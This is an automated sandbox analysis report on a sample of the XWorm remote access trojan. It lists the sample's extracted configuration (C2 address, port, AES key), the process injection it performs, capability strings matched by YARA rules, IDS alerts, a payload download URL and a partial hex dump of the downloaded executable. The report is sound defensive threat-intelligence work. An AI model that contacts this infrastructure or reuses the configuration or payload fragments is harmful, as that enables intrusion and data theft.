Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
v4mNsTzbsL.exe

Overview

General Information

Sample name:v4mNsTzbsL.exe
renamed because original name is a hash value
Original sample name:7da3802f280128d411770f88e0e898986704ce2ef4772e914bf52ecb67093dbe.exe
Analysis ID:1640799
MD5:36d00030ef6be50ff0bc63f1002cf72b
SHA1:8f32e08489609151f7a14e67071722727984857d
SHA256:7da3802f280128d411770f88e0e898986704ce2ef4772e914bf52ecb67093dbe
Tags:92-255-85-2bookingclickfixexefakecaptchaSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • v4mNsTzbsL.exe (PID: 8872 cmdline: "C:\Users\user\Desktop\v4mNsTzbsL.exe" MD5: 36D00030EF6BE50FF0BC63F1002CF72B)
    • MSBuild.exe (PID: 8920 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xe6126:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe61c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe62d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe5f98:$cnc4: POST / HTTP/1.1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6a80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x68f2:$cnc4: POST / HTTP/1.1
    00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x70f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x103c0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7191:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1045d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x72a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10572:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6f66:$cnc4: POST / HTTP/1.1
      • 0x10232:$cnc4: POST / HTTP/1.1
      00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 4 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.MSBuild.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          1.2.MSBuild.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x58a9:$str01: $VB$Local_Port
          • 0x589a:$str02: $VB$Local_Host
          • 0x5ba0:$str03: get_Jpeg
          • 0x5552:$str04: get_ServicePack
          • 0x6546:$str05: Select * from AntivirusProduct
          • 0x6744:$str06: PCRestart
          • 0x6758:$str07: shutdown.exe /f /r /t 0
          • 0x680a:$str08: StopReport
          • 0x67e0:$str09: StopDDos
          • 0x68d6:$str10: sendPlugin
          • 0x6956:$str11: OfflineKeylogger Not Enabled
          • 0x6aae:$str12: -ExecutionPolicy Bypass -File "
          • 0x6bd7:$str13: Content-length: 5235
          1.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.v4mNsTzbsL.exe.2ceef48.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.v4mNsTzbsL.exe.2ceef48.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x3aa9:$str01: $VB$Local_Port
            • 0x3a9a:$str02: $VB$Local_Host
            • 0x3da0:$str03: get_Jpeg
            • 0x3752:$str04: get_ServicePack
            • 0x4746:$str05: Select * from AntivirusProduct
            • 0x4944:$str06: PCRestart
            • 0x4958:$str07: shutdown.exe /f /r /t 0
            • 0x4a0a:$str08: StopReport
            • 0x49e0:$str09: StopDDos
            • 0x4ad6:$str10: sendPlugin
            • 0x4b56:$str11: OfflineKeylogger Not Enabled
            • 0x4cae:$str12: -ExecutionPolicy Bypass -File "
            • 0x690e:$str12: -ExecutionPolicy Bypass -File "
            • 0x4dd7:$str13: Content-length: 5235
            • 0x6a37:$str13: Content-length: 5235
            Click to see the 13 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-17T18:39:13.686271+010020197142Potentially Bad Traffic192.168.2.54972292.255.85.280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-17T18:39:23.423578+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:39:32.712762+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:39:46.952483+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:39:53.430290+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:01.200759+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:15.430684+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:22.036220+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:23.423451+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:26.425933+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:26.586380+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:26.764737+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:31.581712+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:31.753001+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:32.098611+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:37.425003+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:42.227487+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:47.979773+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:48.153613+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:53.931861+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:54.159271+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:40:56.670541+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:04.152966+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:05.102070+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:09.367440+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:14.791762+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:20.769750+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:21.566171+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:23.433582+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:24.096530+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:38.335284+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:41.272098+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:43.445246+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:43.638718+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:53.324340+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:53.539885+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:55.165962+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:58.975392+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:59.143194+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:41:59.317952+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:08.470663+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:15.333680+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:15.518092+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:22.660726+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:23.439809+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:24.558304+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:31.686161+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:37.600373+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:37.774522+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:37.963016+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:39.495850+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:40.335327+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:40.853407+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:53.439748+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:55.074381+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:42:58.644393+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:43:04.272022+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:43:04.316925+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:43:09.330566+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:43:16.931813+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            2025-03-17T18:43:19.478268+010028528701Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-17T18:39:32.720736+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:39:46.955435+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:01.203244+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:15.433563+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:22.037904+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:26.437902+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:26.588691+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:26.766432+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:31.583459+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:31.759112+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:31.920124+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:31.926587+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:32.099944+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:37.426415+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:42.272921+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:47.982591+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:48.155138+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:53.933351+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:40:56.672657+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:04.155044+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:05.104121+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:09.370830+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:14.793762+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:20.771950+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:21.572423+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:21.791326+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:21.796200+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:24.098191+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:38.347938+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:41.273495+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:43.448742+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:43.641041+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:43.825345+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:43.835230+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:53.325966+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:55.167540+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:58.976870+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:59.144538+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:41:59.319761+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:08.472408+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:15.335580+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:15.523618+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:22.662765+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:24.560281+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:31.687728+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:37.602073+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:37.778150+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:37.967045+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:39.664477+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:40.337070+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:40.855185+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:55.077647+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:42:58.645919+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:04.273513+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:04.318264+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:04.543122+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:04.549782+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:09.346722+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:16.935939+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            2025-03-17T18:43:19.482317+010028529231Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-17T18:39:23.423578+010028588011Malware Command and Control Activity Detected92.255.85.24372192.168.2.549723TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-17T18:41:20.480746+010028587991Malware Command and Control Activity Detected192.168.2.54972392.255.85.24372TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://92.255.85.2/pq.exeAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Multi AV Scanner detection for submitted file
            Source: v4mNsTzbsL.exeVirustotal: Detection: 50%Perma Link
            Source: v4mNsTzbsL.exeReversingLabs: Detection: 47%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: 92.255.85.2
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: 4372
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: P0WER
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
            Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
            Source: v4mNsTzbsL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.85.2:4372 -> 192.168.2.5:49723
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.85.2:4372 -> 192.168.2.5:49723
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49723 -> 92.255.85.2:4372
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49723 -> 92.255.85.2:4372
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49723 -> 92.255.85.2:4372
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 92.255.85.2
            Source: global trafficTCP traffic: 192.168.2.5:49723 -> 92.255.85.2:4372
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 16 Mar 2025 16:42:29 GMTAccept-Ranges: bytesETag: "144d689296db1:0"Server: Microsoft-IIS/10.0Date: Mon, 17 Mar 2025 17:39:13 GMTContent-Length: 33280Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 75 ff d6 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 4f 00 00 f0 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 0a 0
            Source: global trafficHTTP traffic detected: GET /pq.exe HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: SOVTEL-ASRU SOVTEL-ASRU
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49722 -> 92.255.85.2:80
